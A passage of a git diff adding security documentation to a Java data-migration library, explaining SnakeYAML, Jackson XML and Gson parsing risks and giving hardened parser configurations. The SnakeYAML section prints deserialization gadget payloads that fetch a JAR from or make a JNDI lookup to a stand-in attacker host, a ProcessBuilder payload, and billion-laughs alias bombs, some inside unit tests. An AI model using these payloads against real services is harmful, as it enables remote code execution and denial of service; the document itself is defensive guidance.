+ +| Risk | Severity | Mitigation | +|----------------------------------|--------------|----------------------------------| +| Arbitrary Code Execution | **Critical** | Use `SafeConstructor` | +| Billion Laughs (Alias Expansion) | High | Limit `maxAliasesForCollections` | +| Stack Overflow | Medium | Limit `nestingDepthLimit` | +| Resource Exhaustion | Medium | Limit `codePointLimit` | + +## Arbitrary Code Execution + +### The Vulnerability + +SnakeYAML's default constructor can instantiate arbitrary Java classes using YAML tags: + +```yaml +# This YAML can execute arbitrary code with default Yaml() +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker.com/malicious.jar"] + ]] +] +``` + +When parsed with `new Yaml().load(input)`, this: +1. Creates a `URLClassLoader` pointing to an attacker's server +2. Loads a malicious JAR file +3. Instantiates `ScriptEngineManager` with the malicious classloader +4. Executes arbitrary code on your server + +### Other Dangerous Payloads + +```yaml +# Execute shell command (via ProcessBuilder) +!!java.lang.ProcessBuilder [["calc.exe"]] + +# JNDI injection +!!com.sun.rowset.JdbcRowSetImpl + dataSourceName: "ldap://attacker.com/exploit" + autoCommit: true +``` + +### The Solution: SafeConstructor + +**Always** use `SafeConstructor` when parsing untrusted YAML: + +```java +import org.yaml.snakeyaml.Yaml; +import org.yaml.snakeyaml.constructor.SafeConstructor; +import org.yaml.snakeyaml.LoaderOptions; + +// UNSAFE - Never do this with untrusted input: +// Yaml yaml = new Yaml(); + +// SAFE - Always use SafeConstructor: +Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions())); +Object data = yaml.load(untrustedInput); +``` + +`SafeConstructor` only allows construction of basic Java types: +- `String`, `Integer`, `Long`, `Double`, `Boolean` +- `List`, `Map` +- `Date`, `byte[]` + +Any YAML with custom tags (`!!classname`) will throw an exception. + +--- + +## Billion Laughs Attack + +### The Vulnerability + +YAML aliases allow referencing previously defined anchors. Attackers can create exponentially expanding structures: + +```yaml +a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] +b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] +c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] +d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] +e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] +f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] +g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] +h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] +i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] +``` + +This small YAML file expands to **billions** of strings, consuming all available memory. + +### The Solution: Limit Alias Expansion + +```java +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); // Default is 50, adjust as needed + +Yaml yaml = new Yaml(new SafeConstructor(options)); +``` + +With this limit, the parser throws an exception when alias expansion exceeds the threshold. 
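+
+In practice you will usually want to translate that parser failure into your application's own rejection path rather than letting it propagate raw. A small sketch — the exception mapping and limit value are illustrative:
+
+```java
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import org.yaml.snakeyaml.error.YAMLException;
+
+public final class AliasLimitExample {
+
+    public static Object loadOrReject(String untrustedYaml) {
+        LoaderOptions options = new LoaderOptions();
+        options.setMaxAliasesForCollections(50);
+        Yaml yaml = new Yaml(new SafeConstructor(options));
+        try {
+            return yaml.load(untrustedYaml);
+        } catch (YAMLException e) {
+            // Alias expansion (or another YAML limit) was exceeded
+            throw new SecurityException("Rejected YAML input: " + e.getMessage(), e);
+        }
+    }
+}
+```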
+
+---
+
+## Complete Secure Configuration
+
+Use this configuration for all untrusted YAML:
+
+```java
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+
+import java.io.InputStream;
+
+public class SecureYamlParser {
+
+    private static final int MAX_ALIASES = 50;
+    private static final int MAX_DEPTH = 50;
+    private static final int MAX_CODE_POINTS = 3 * 1024 * 1024; // 3MB
+
+    private final Yaml yaml;
+
+    public SecureYamlParser() {
+        LoaderOptions options = new LoaderOptions();
+
+        // Prevent Billion Laughs attack
+        options.setMaxAliasesForCollections(MAX_ALIASES);
+
+        // Prevent stack overflow from deep nesting
+        options.setNestingDepthLimit(MAX_DEPTH);
+
+        // Limit total input size
+        options.setCodePointLimit(MAX_CODE_POINTS);
+
+        // Reject duplicate keys (data integrity)
+        options.setAllowDuplicateKeys(false);
+
+        // Use SafeConstructor to prevent RCE
+        this.yaml = new Yaml(new SafeConstructor(options));
+    }
+
+    public Dynamic<Object> parse(String untrustedYaml) {
+        Object data = yaml.load(untrustedYaml);
+        return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+    }
+
+    public Dynamic<Object> parse(InputStream untrustedInput) {
+        Object data = yaml.load(untrustedInput);
+        return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+    }
+}
+```
+
+---
+
+## LoaderOptions Reference
+
+| Option                     | Default | Recommended       | Purpose                   |
+|----------------------------|---------|-------------------|---------------------------|
+| `maxAliasesForCollections` | 50      | 50 or less        | Prevent Billion Laughs    |
+| `nestingDepthLimit`        | 50      | 50 or less        | Prevent stack overflow    |
+| `codePointLimit`           | 3MB     | Based on use case | Limit input size          |
+| `allowDuplicateKeys`       | true    | **false**         | Data integrity            |
+| `allowRecursiveKeys`       | false   | false             | Prevent recursive anchors |
+| `wrappedToRootException`   | false   | true              | Better error handling     |
+
+---
+
+## Integration with Aether Datafixers
+
+### Secure Migration Service
+
+```java
+public class SecureYamlMigrationService {
+
+    private final AetherDataFixer fixer;
+    private final Yaml yaml;
+
+    public SecureYamlMigrationService(AetherDataFixer fixer) {
+        this.fixer = fixer;
+
+        LoaderOptions options = new LoaderOptions();
+        options.setMaxAliasesForCollections(50);
+        options.setNestingDepthLimit(50);
+        options.setCodePointLimit(3 * 1024 * 1024);
+        options.setAllowDuplicateKeys(false);
+
+        this.yaml = new Yaml(new SafeConstructor(options));
+    }
+
+    public TaggedDynamic<Object> migrate(
+            String untrustedYaml,
+            TypeReference type,
+            DataVersion from,
+            DataVersion to) {
+
+        // Parse with safe settings
+        Object data = yaml.load(untrustedYaml);
+        Dynamic<Object> dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+
+        // Migrate
+        TaggedDynamic<Object> tagged = new TaggedDynamic<>(type, dynamic);
+        return fixer.update(tagged, from, to);
+    }
+}
+```
+
+### Pre-Validation
+
+For additional security, validate input before parsing:
+
+```java
+public class YamlValidator {
+
+    private static final long MAX_SIZE = 1024 * 1024; // 1MB
+
+    public void validateBeforeParsing(byte[] input) {
+        if (input.length > MAX_SIZE) {
+            throw new SecurityException("YAML input exceeds maximum size");
+        }
+    }
+
+    public void validateBeforeParsing(String input) {
+        if (input.length() > MAX_SIZE) {
+            throw new SecurityException("YAML input exceeds maximum size");
+        }
+    }
+}
+```
+
+---
+
+## Testing Your Configuration
+
+Verify your configuration rejects
malicious payloads: + +```java +@Test +void rejectsArbitraryClassInstantiation() { + String maliciousYaml = "!!java.lang.ProcessBuilder [[\"calc.exe\"]]"; + + Yaml safeYaml = new Yaml(new SafeConstructor(new LoaderOptions())); + + assertThrows(YAMLException.class, () -> safeYaml.load(maliciousYaml)); +} + +@Test +void rejectsBillionLaughs() { + String billionLaughs = """ + a: &a ["lol"] + b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a] + c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b] + d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c] + e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d] + f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e] + """; + + LoaderOptions options = new LoaderOptions(); + options.setMaxAliasesForCollections(50); + Yaml safeYaml = new Yaml(new SafeConstructor(options)); + + assertThrows(YAMLException.class, () -> safeYaml.load(billionLaughs)); +} +``` + +--- + +## Common Mistakes + +### Mistake 1: Using Default Constructor + +```java +// WRONG - Vulnerable to RCE +Yaml yaml = new Yaml(); +Object data = yaml.load(userInput); +``` + +### Mistake 2: Using Custom Constructor Without SafeConstructor + +```java +// WRONG - Custom constructor may still be vulnerable +class MyConstructor extends Constructor { + // ... +} +Yaml yaml = new Yaml(new MyConstructor()); +``` + +### Mistake 3: Forgetting LoaderOptions + +```java +// WRONG - No limits on aliases or depth +Yaml yaml = new Yaml(new SafeConstructor()); // Uses default LoaderOptions +``` + +**Correct:** +```java +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); +options.setNestingDepthLimit(50); +Yaml yaml = new Yaml(new SafeConstructor(options)); +``` + +--- + +## Related + +- [Threat Model](../threat-model.md) +- [Best Practices](../best-practices.md) +- [YAML Support](../../codec/yaml.md) +- [Secure Configuration Examples](../secure-configuration-examples.md) diff --git a/docs/security/index.md b/docs/security/index.md new file mode 100644 index 0000000..ddb17df --- /dev/null +++ b/docs/security/index.md @@ -0,0 +1,118 @@ +# Security Overview + +This section provides guidance for securely handling untrusted data with Aether Datafixers. When processing data from external sources—user uploads, APIs, message queues, or file imports—proper security measures are essential to prevent attacks. + +## Quick Reference + +| Threat | Affected Formats | Risk | Mitigation | +|-----------------------------------|------------------|--------------|---------------------------| +| Arbitrary Code Execution | YAML (SnakeYAML) | **Critical** | Use `SafeConstructor` | +| Billion Laughs (Entity Expansion) | YAML, XML | High | Limit aliases/entities | +| XXE (External Entity Injection) | XML | High | Disable external entities | +| Polymorphic Deserialization | JSON (Jackson) | Medium | Avoid default typing | +| Resource Exhaustion | All | Medium | Size and depth limits | +| Stack Overflow | All | Medium | Nesting depth limits | + +## When to Apply Security Measures + +Apply the security recommendations in this documentation when: + +- **User Uploads** — Processing files uploaded by users (game saves, configs, data imports) +- **External APIs** — Consuming data from third-party APIs +- **Message Queues** — Processing messages from queues (Kafka, RabbitMQ, etc.) 
+- **Database Blobs** — Migrating serialized data stored in databases
+- **File Imports** — Reading configuration or data files from untrusted sources
+
+## Documentation Structure
+
+### [Threat Model](threat-model.md)
+
+Understand the attack vectors and trust boundaries:
+- Classification of untrusted data sources
+- Detailed attack vector descriptions
+- Impact assessment and risk analysis
+
+### [Format-Specific Security](format-considerations/index.md)
+
+Security considerations for each serialization format:
+- [SnakeYAML Security](format-considerations/snakeyaml.md) — **Critical: RCE prevention**
+- [Jackson Security](format-considerations/jackson.md) — XXE, polymorphic typing, depth limits
+- [Gson Security](format-considerations/gson.md) — Safe defaults and validation
+
+### [Best Practices](best-practices.md)
+
+General security best practices:
+- Input validation before migration
+- Size and depth limits
+- Timeout configuration
+- Defense-in-depth checklist
+
+### [Secure Configuration Examples](secure-configuration-examples.md)
+
+Ready-to-use secure configurations:
+- Safe `Yaml` setup for SnakeYAML
+- Safe `ObjectMapper` setup for Jackson
+- Safe `XmlMapper` setup for Jackson XML
+- Complete migration service example
+
+### [Spring Security Integration](spring-security-integration.md)
+
+Integrating security with Spring Boot:
+- Secure bean configuration
+- Request validation filters
+- Rate limiting
+- Audit logging
+
+## Quick Start: Secure Configuration
+
+### SnakeYAML (Critical)
+
+```java
+// ALWAYS use SafeConstructor for untrusted YAML
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+options.setCodePointLimit(3 * 1024 * 1024);
+
+Yaml safeYaml = new Yaml(new SafeConstructor(options));
+Object data = safeYaml.load(untrustedInput);
+Dynamic<Object> dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+```
+
+### Jackson JSON
+
+```java
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+    .maxNestingDepth(50)
+    .maxStringLength(1_000_000)
+    .build();
+
+JsonFactory factory = JsonFactory.builder()
+    .streamReadConstraints(constraints)
+    .build();
+
+ObjectMapper safeMapper = new ObjectMapper(factory);
+JsonNode node = safeMapper.readTree(untrustedInput);
+Dynamic<JsonNode> dynamic = new Dynamic<>(JacksonJsonOps.INSTANCE, node);
+```
+
+### Jackson XML (XXE Prevention)
+
+```java
+XMLInputFactory xmlFactory = XMLInputFactory.newFactory();
+xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+
+XmlMapper safeMapper = XmlMapper.builder(
+    XmlFactory.builder().xmlInputFactory(xmlFactory).build()
+).build();
+JsonNode node = safeMapper.readTree(untrustedInput);
+Dynamic<JsonNode> dynamic = new Dynamic<>(JacksonXmlOps.INSTANCE, node);
+```
+
+## Related
+
+- [Codec Overview](../codec/index.md)
+- [YAML Support](../codec/yaml.md)
+- [XML Support](../codec/xml.md)
+- [JSON Support](../codec/json.md)
diff --git a/docs/security/secure-configuration-examples.md b/docs/security/secure-configuration-examples.md
new file mode 100644
index 0000000..4d75c9d
--- /dev/null
+++ b/docs/security/secure-configuration-examples.md
@@ -0,0 +1,513 @@
+# Secure Configuration Examples
+
+This document provides ready-to-use secure configurations for all supported formats. Copy and adapt these examples for your application.
+
+## Quick Reference
+
+| Format       | Primary Risk              | Required Configuration              |
+|--------------|---------------------------|-------------------------------------|
+| SnakeYAML    | RCE                       | `SafeConstructor` + `LoaderOptions` |
+| Jackson JSON | Polymorphic typing, depth | `StreamReadConstraints`             |
+| Jackson XML  | XXE                       | Disable external entities           |
+| Jackson YAML | Depth                     | `StreamReadConstraints`             |
+| Gson         | Large payloads            | Pre-validation                      |
+
+---
+
+## SnakeYAML Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps;
+
+public class SecureSnakeYamlConfig {
+
+    /**
+     * Creates a secure Yaml instance for parsing untrusted input.
+     */
+    public static Yaml createSecureYaml() {
+        LoaderOptions options = new LoaderOptions();
+
+        // Prevent Billion Laughs (alias expansion attack)
+        options.setMaxAliasesForCollections(50);
+
+        // Prevent stack overflow from deep nesting
+        options.setNestingDepthLimit(50);
+
+        // Limit input size (3MB default)
+        options.setCodePointLimit(3 * 1024 * 1024);
+
+        // Reject duplicate keys for data integrity
+        options.setAllowDuplicateKeys(false);
+
+        // Use SafeConstructor to prevent arbitrary class instantiation
+        return new Yaml(new SafeConstructor(options));
+    }
+
+    /**
+     * Parses untrusted YAML securely and returns a Dynamic.
+     */
+    public static Dynamic<Object> parseSecurely(String yaml) {
+        Yaml safeYaml = createSecureYaml();
+        Object data = safeYaml.load(yaml);
+        return new Dynamic<>(SnakeYamlOps.INSTANCE, data);
+    }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted YAML
+String untrustedYaml = request.getBody();
+Dynamic<Object> dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml);
+
+// Migrate
+TaggedDynamic<Object> tagged = new TaggedDynamic<>(TypeReferences.PLAYER, dynamic);
+TaggedDynamic<Object> result = fixer.update(tagged, fromVersion, toVersion);
+```
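+
+When the YAML arrives as raw bytes (for example a file upload), capping the payload size before decoding keeps oversized input out of the parser entirely. A minimal sketch — the 1 MB cap and helper name are illustrative:
+
+```java
+import java.nio.charset.StandardCharsets;
+
+// Sketch: cap the raw payload size before handing it to the parser
+public static Dynamic<Object> parseUpload(byte[] upload) {
+    if (upload.length > 1024 * 1024) { // 1MB cap, adjust to your use case
+        throw new SecurityException("Upload exceeds maximum size");
+    }
+    String yaml = new String(upload, StandardCharsets.UTF_8);
+    return SecureSnakeYamlConfig.parseSecurely(yaml);
+}
+```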
+
+---
+
+## Jackson JSON Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+
+public class SecureJacksonJsonConfig {
+
+    /**
+     * Creates a secure ObjectMapper for parsing untrusted JSON.
+     */
+    public static ObjectMapper createSecureMapper() {
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)        // Prevent stack overflow
+            .maxNumberLength(100)       // Limit number string length
+            .maxStringLength(1_000_000) // 1MB max string
+            .maxNameLength(1_000)       // Limit field name length
+            .build();
+
+        JsonFactory factory = JsonFactory.builder()
+            .streamReadConstraints(constraints)
+            .build();
+
+        return new ObjectMapper(factory);
+    }
+
+    /**
+     * Creates secure JacksonJsonOps instance.
+     */
+    public static JacksonJsonOps createSecureOps() {
+        return new JacksonJsonOps(createSecureMapper());
+    }
+
+    /**
+     * Parses untrusted JSON securely and returns a Dynamic.
+     */
+    public static Dynamic<JsonNode> parseSecurely(String json) throws Exception {
+        ObjectMapper mapper = createSecureMapper();
+        JsonNode node = mapper.readTree(json);
+        return new Dynamic<>(JacksonJsonOps.INSTANCE, node);
+    }
+
+    /**
+     * Parses untrusted JSON securely with custom ops.
+     */
+    public static Dynamic<JsonNode> parseSecurely(byte[] json) throws Exception {
+        JacksonJsonOps ops = createSecureOps();
+        JsonNode node = ops.mapper().readTree(json);
+        return new Dynamic<>(ops, node);
+    }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted JSON
+byte[] untrustedJson = request.getBodyAsBytes();
+Dynamic<JsonNode> dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson);
+
+// Migrate
+TaggedDynamic<JsonNode> tagged = new TaggedDynamic<>(TypeReferences.CONFIG, dynamic);
+TaggedDynamic<JsonNode> result = fixer.update(tagged, fromVersion, toVersion);
+```
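+
+Constraint violations surface as `StreamConstraintsException`, which you may want to translate into your own rejection path instead of a generic parse error. A short sketch — the wrapper name and exception mapping are illustrative:
+
+```java
+import com.fasterxml.jackson.core.exc.StreamConstraintsException;
+
+// Sketch: translate constraint violations into a client-facing rejection
+public static Dynamic<JsonNode> parseOrReject(byte[] json) throws Exception {
+    try {
+        return SecureJacksonJsonConfig.parseSecurely(json);
+    } catch (StreamConstraintsException e) {
+        // Input exceeded a configured limit (depth, string length, ...)
+        throw new SecurityException("Rejected JSON input: " + e.getOriginalMessage(), e);
+    }
+}
+```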
+
+---
+
+## Jackson XML Secure Configuration (XXE Prevention)
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureJacksonXmlConfig {
+
+    /**
+     * Creates a secure XmlMapper with XXE prevention.
+     */
+    public static XmlMapper createSecureMapper() {
+        // Configure secure XMLInputFactory
+        XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+
+        // Disable external entities (XXE prevention)
+        xmlInputFactory.setProperty(
+            XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+
+        // Disable DTD processing
+        xmlInputFactory.setProperty(
+            XMLInputFactory.SUPPORT_DTD, false);
+
+        // Disable entity replacement
+        xmlInputFactory.setProperty(
+            XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+        // Configure read constraints
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)
+            .maxStringLength(1_000_000)
+            .build();
+
+        // Build secure factory
+        XmlFactory factory = XmlFactory.builder()
+            .xmlInputFactory(xmlInputFactory)
+            .streamReadConstraints(constraints)
+            .build();
+
+        return XmlMapper.builder(factory).build();
+    }
+
+    /**
+     * Creates secure JacksonXmlOps instance.
+     */
+    public static JacksonXmlOps createSecureOps() {
+        return new JacksonXmlOps(createSecureMapper());
+    }
+
+    /**
+     * Parses untrusted XML securely and returns a Dynamic.
+     */
+    public static Dynamic<JsonNode> parseSecurely(String xml) throws Exception {
+        XmlMapper mapper = createSecureMapper();
+        JsonNode node = mapper.readTree(xml);
+        return new Dynamic<>(new JacksonXmlOps(mapper), node);
+    }
+}
+```
+
+### Usage Example
+
+```java
+// Parse untrusted XML
+String untrustedXml = request.getBody();
+Dynamic<JsonNode> dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml);
+
+// Migrate
+TaggedDynamic<JsonNode> tagged = new TaggedDynamic<>(TypeReferences.SETTINGS, dynamic);
+TaggedDynamic<JsonNode> result = fixer.update(tagged, fromVersion, toVersion);
+```
+
+---
+
+## Jackson YAML Secure Configuration
+
+### Basic Secure Setup
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
+import com.fasterxml.jackson.dataformat.yaml.YAMLMapper;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+
+public class SecureJacksonYamlConfig {
+
+    /**
+     * Creates a secure YAMLMapper for parsing untrusted input.
+     */
+    public static YAMLMapper createSecureMapper() {
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)
+            .maxStringLength(1_000_000)
+            .build();
+
+        YAMLFactory factory = YAMLFactory.builder()
+            .streamReadConstraints(constraints)
+            .build();
+
+        return new YAMLMapper(factory);
+    }
+
+    /**
+     * Creates secure JacksonYamlOps instance.
+     */
+    public static JacksonYamlOps createSecureOps() {
+        return new JacksonYamlOps(createSecureMapper());
+    }
+
+    /**
+     * Parses untrusted YAML securely and returns a Dynamic.
+     */
+    public static Dynamic<JsonNode> parseSecurely(String yaml) throws Exception {
+        YAMLMapper mapper = createSecureMapper();
+        JsonNode node = mapper.readTree(yaml);
+        return new Dynamic<>(new JacksonYamlOps(mapper), node);
+    }
+}
+```
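+
+### Usage Example
+
+Usage mirrors the other formats. A sketch — `request`, `fixer`, the type reference, and the version values are assumed from the surrounding examples:
+
+```java
+// Parse untrusted YAML (Jackson variant)
+String untrustedYaml = request.getBody();
+Dynamic<JsonNode> dynamic = SecureJacksonYamlConfig.parseSecurely(untrustedYaml);
+
+// Migrate
+TaggedDynamic<JsonNode> tagged = new TaggedDynamic<>(TypeReferences.CONFIG, dynamic);
+TaggedDynamic<JsonNode> result = fixer.update(tagged, fromVersion, toVersion);
+```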
+
+---
+
+## Gson Secure Configuration
+
+### Basic Secure Setup with Validation
+
+```java
+import com.google.gson.Gson;
+import com.google.gson.GsonBuilder;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonParser;
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+
+public class SecureGsonConfig {
+
+    private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB
+    private static final int MAX_DEPTH = 50;
+
+    /**
+     * Creates a Gson instance (safe by default).
+     */
+    public static Gson createGson() {
+        return new GsonBuilder()
+            .disableHtmlEscaping()
+            .create();
+    }
+
+    /**
+     * Parses untrusted JSON securely with size and depth validation.
+     */
+    public static Dynamic<JsonElement> parseSecurely(String json) {
+        // Validate size
+        if (json.length() > MAX_SIZE) {
+            throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE);
+        }
+
+        // Parse
+        JsonElement element = JsonParser.parseString(json);
+
+        // Validate depth
+        validateDepth(element, 0);
+
+        return new Dynamic<>(GsonOps.INSTANCE, element);
+    }
+
+    private static void validateDepth(JsonElement element, int depth) {
+        if (depth > MAX_DEPTH) {
+            throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH);
+        }
+
+        if (element.isJsonObject()) {
+            element.getAsJsonObject().entrySet()
+                .forEach(e -> validateDepth(e.getValue(), depth + 1));
+        } else if (element.isJsonArray()) {
+            element.getAsJsonArray()
+                .forEach(e -> validateDepth(e, depth + 1));
+        }
+    }
+}
+```
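+
+### Usage Example
+
+A sketch of the same parse-then-migrate flow for Gson — `request`, `fixer`, the type reference, and the versions are assumed from the surrounding examples:
+
+```java
+// Parse untrusted JSON with pre-validation
+String untrustedJson = request.getBody();
+Dynamic<JsonElement> dynamic = SecureGsonConfig.parseSecurely(untrustedJson);
+
+// Migrate
+TaggedDynamic<JsonElement> tagged = new TaggedDynamic<>(TypeReferences.DATA, dynamic);
+TaggedDynamic<JsonElement> result = fixer.update(tagged, fromVersion, toVersion);
+```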
+
+---
+
+## Complete Migration Service
+
+A complete service combining all security measures:
+
+```java
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.AetherDataFixer;
+import de.splatgames.aether.datafixers.api.schema.DataVersion;
+import de.splatgames.aether.datafixers.api.type.TaggedDynamic;
+import de.splatgames.aether.datafixers.api.type.TypeReference;
+
+import com.fasterxml.jackson.databind.JsonNode;
+
+import java.time.Duration;
+import java.util.concurrent.*;
+
+public class SecureMigrationService {
+
+    private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024;
+    private static final Duration TIMEOUT = Duration.ofSeconds(30);
+
+    private final AetherDataFixer fixer;
+    private final ExecutorService executor;
+
+    public SecureMigrationService(AetherDataFixer fixer) {
+        this.fixer = fixer;
+        this.executor = Executors.newCachedThreadPool();
+    }
+
+    /**
+     * Migrates untrusted JSON using Jackson.
+     */
+    public TaggedDynamic<JsonNode> migrateJson(
+            byte[] untrustedJson,
+            TypeReference type,
+            DataVersion from,
+            DataVersion to) throws Exception {
+
+        validateSize(untrustedJson);
+        Dynamic<JsonNode> dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson);
+        return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+    }
+
+    /**
+     * Migrates untrusted YAML using SnakeYAML.
+     */
+    public TaggedDynamic<Object> migrateYaml(
+            String untrustedYaml,
+            TypeReference type,
+            DataVersion from,
+            DataVersion to) throws Exception {
+
+        validateSize(untrustedYaml);
+        Dynamic<Object> dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml);
+        return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+    }
+
+    /**
+     * Migrates untrusted XML using Jackson.
+     */
+    public TaggedDynamic<JsonNode> migrateXml(
+            String untrustedXml,
+            TypeReference type,
+            DataVersion from,
+            DataVersion to) throws Exception {
+
+        validateSize(untrustedXml);
+        Dynamic<JsonNode> dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml);
+        return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+    }
+
+    private void validateSize(byte[] data) {
+        if (data.length > MAX_PAYLOAD_SIZE) {
+            throw new PayloadTooLargeException(
+                "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE);
+        }
+    }
+
+    private void validateSize(String data) {
+        if (data.length() > MAX_PAYLOAD_SIZE) {
+            throw new PayloadTooLargeException(
+                "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE);
+        }
+    }
+
+    private <T> TaggedDynamic<T> migrateWithTimeout(
+            TaggedDynamic<T> input,
+            DataVersion from,
+            DataVersion to) throws Exception {
+
+        Future<TaggedDynamic<T>> future = executor.submit(
+            () -> fixer.update(input, from, to)
+        );
+
+        try {
+            return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS);
+        } catch (TimeoutException e) {
+            future.cancel(true);
+            throw new MigrationTimeoutException("Migration timed out after " + TIMEOUT, e);
+        } catch (ExecutionException e) {
+            throw new MigrationException("Migration failed", e.getCause());
+        }
+    }
+
+    public void shutdown() {
+        executor.shutdown();
+    }
+}
+```
+
+### Usage
+
+```java
+SecureMigrationService service = new SecureMigrationService(fixer);
+
+// Migrate JSON
+TaggedDynamic<JsonNode> result = service.migrateJson(
+    jsonBytes,
+    TypeReferences.PLAYER,
+    new DataVersion(100),
+    new DataVersion(200)
+);
+
+// Migrate YAML
+TaggedDynamic<Object> yamlResult = service.migrateYaml(
+    yamlString,
+    TypeReferences.CONFIG,
+    new DataVersion(1),
+    new DataVersion(5)
+);
+
+// Migrate XML
+TaggedDynamic<JsonNode> xmlResult = service.migrateXml(
+    xmlString,
+    TypeReferences.SETTINGS,
+    new DataVersion(1),
+    new DataVersion(3)
+);
+```
+
+---
+
+## Exception Classes
+
+```java
+public class PayloadTooLargeException extends SecurityException {
+    public PayloadTooLargeException(String message) {
+        super(message);
+    }
+}
+
+public class MigrationTimeoutException extends RuntimeException {
+    public MigrationTimeoutException(String message, Throwable cause) {
+        super(message, cause);
+    }
+}
+
+public class MigrationException extends RuntimeException {
+    public MigrationException(String message, Throwable cause) {
+        super(message, cause);
+    }
+}
+```
+
+---
+
+## Related
+
+- [Best Practices](best-practices.md)
+- [SnakeYAML Security](format-considerations/snakeyaml.md)
+- [Jackson Security](format-considerations/jackson.md)
+- [Gson Security](format-considerations/gson.md)
+- [Spring Security Integration](spring-security-integration.md)
diff --git a/docs/security/spring-security-integration.md b/docs/security/spring-security-integration.md
new file mode 100644
index 0000000..87087fe
--- /dev/null
+++ b/docs/security/spring-security-integration.md
@@ -0,0 +1,649 @@
+# Spring Security Integration
+
+This guide covers integrating secure Aether Datafixers usage with Spring Boot and Spring Security.
+
+## Overview
+
+When using the `aether-datafixers-spring-boot-starter`, additional security measures should be implemented at the Spring level:
+
+1. **Secure Bean Configuration** — Configure secure parsers as Spring beans
